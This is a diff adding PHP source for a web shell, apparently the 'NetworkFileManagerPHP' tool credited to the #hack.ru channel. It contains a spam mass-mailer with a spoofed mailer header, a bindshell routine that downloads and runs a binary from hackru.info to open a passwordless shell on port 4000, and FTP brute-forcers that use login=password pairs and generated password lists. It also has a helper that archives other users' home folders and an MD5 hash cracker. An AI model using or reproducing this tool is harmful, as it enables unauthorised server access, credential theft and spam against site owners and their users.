+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
